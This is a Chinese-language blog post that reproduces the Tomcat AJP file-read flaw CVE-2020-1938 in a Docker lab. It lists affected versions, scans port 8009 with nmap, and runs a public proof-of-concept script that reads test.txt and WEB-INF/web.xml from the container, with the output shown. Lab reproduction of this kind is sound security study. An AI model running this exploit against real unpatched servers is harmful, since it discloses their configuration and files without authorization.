System Integration Project Manager.

Tomcat Ajp 漏洞复现(CVE-2020-1938)

2 minute read

漏洞简介

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。

影响范围

  • Apache Tomcat 6
  • Apache Tomcat 7 < 7.0.100
  • Apache Tomcat 8 < 8.5.51
  • Apache Tomcat 9 < 9.0.31

复现

[root@k8s-master-205 ~]# docker search tomcat-8.5.32
NAME                         DESCRIPTION            STARS               OFFICIAL            AUTOMATED
duonghuuphuc/tomcat-8.5.32   JRE8 + Tomcat 8.5.32   1 

[root@k8s-master-205 ~]# docker pull duonghuuphuc/tomcat-8.5.32 
Using default tag: latest
latest: Pulling from duonghuuphuc/tomcat-8.5.32
0bd44ff9c2cf: Pull complete 
047670ddbd2a: Pull complete 
ea7d5dc89438: Pull complete 
f14138372253: Pull complete 
c822581c11cd: Pull complete 
2bfebb1ccea8: Pull complete 
1d2a1447f71c: Pull complete 
610001504afa: Pull complete 
d319698013a7: Pull complete 
bd8134429270: Pull complete 
4db27f113924: Pull complete 
a3a2519c0610: Pull complete 
Digest: sha256:7ad4d0f3f3103fa3be5cdf9637d2f05d5b0cc416ee864ac6ce55ab0556046885
Status: Downloaded newer image for duonghuuphuc/tomcat-8.5.32:latest
docker.io/duonghuuphuc/tomcat-8.5.32:latest

[root@k8s-master-205 ~]# docker images
REPOSITORY                           TAG                 IMAGE ID            CREATED             SIZE
k8s.gcr.io/kube-proxy                v1.17.0             7d54289267dc        2 months ago        116MB
k8s.gcr.io/kube-controller-manager   v1.17.0             5eb3b7486872        2 months ago        161MB
k8s.gcr.io/kube-apiserver            v1.17.0             0cae8d5cc64c        2 months ago        171MB
k8s.gcr.io/kube-scheduler            v1.17.0             78c190f736b1        2 months ago        94.4MB
k8s.gcr.io/coredns                   1.6.5               70f311871ae1        3 months ago        41.6MB
k8s.gcr.io/etcd                      3.4.3-0             303ce5db0e90        4 months ago        288MB
quay.io/coreos/flannel               v0.11.0-amd64       ff281650a721        13 months ago       52.6MB
duonghuuphuc/tomcat-8.5.32           latest              262b3ba65963        19 months ago       463MB
k8s.gcr.io/pause                     3.1                 da86e6ba6ca1        2 years ago         742kB

[root@k8s-master-205 ~]# docker run -d -p 8080:8080 -p 8009:8009 --name cve20201938 duonghuuphuc/tomcat-8.5.32

[root@k8s-master-205 ~]# docker port cve20201938
8009/tcp -> 0.0.0.0:8009
8080/tcp -> 0.0.0.0:8080

[root@k8s-master-205 opt]# curl 192.168.11.205:8080

nmap -T4 -A -v 192.168.11.205
8009 tcp open ajp13 Apache Jserv 

[root@k8s-master-205 nmap-7.80]#  docker exec -it cve20201938 /bin/bash
root@b67a8e2def4d:/usr/local/tomcat# pwd
/usr/local/tomcat
root@b67a8e2def4d:/usr/local/tomcat# cd webapps/manager/
root@b67a8e2def4d:/usr/local/tomcat/webapps/manager# echo "this is cve20201938 test!" > test.txt
root@b67a8e2def4d:/usr/local/tomcat/webapps/manager# cd /usr/local/tomcat/webapps/ROOT/
root@b67a8e2def4d:/usr/local/tomcat/webapps/ROOT# echo "this is ROOT test for cve20201938" > test.txt
root@b67a8e2def4d:/usr/local/tomcat/webapps/ROOT# 

[root@Ansible-203 tmp]# git clone https://github.com/xindongzhuaizhuai/CVE-2020-1938.git
正克隆到 'CVE-2020-1938'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (3/3), done.

[root@Ansible-203 CVE-2020-1938]# python CVE-2020-1938.py -p 8009 -f test.txt 192.168.11.205
Getting resource at ajp13://192.168.11.205:8009/asdf
----------------------------
this is ROOT test for cve20201938

[root@Ansible-203 CVE-2020-1938]# python CVE-2020-1938.py -p 8009 -f WEB-INF/web.xml 192.168.11.205
Getting resource at ajp13://192.168.11.205:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
  version="3.1"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>

</web-app>

python2多线程扫描Tomcat-Ajp协议文件读取漏洞 https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner

Categories: ,

Updated:



Leave a comment

You may also enjoy

how to install wekan on Centos 7

4 minute read

官网:https://wekan.github.io/ GITHUB:https://github.com/wekan/wekan 1.root 登陆 基础配置 # hostnamectl set-hostname wekan225 # yum install net-tools -y # vi /etc/...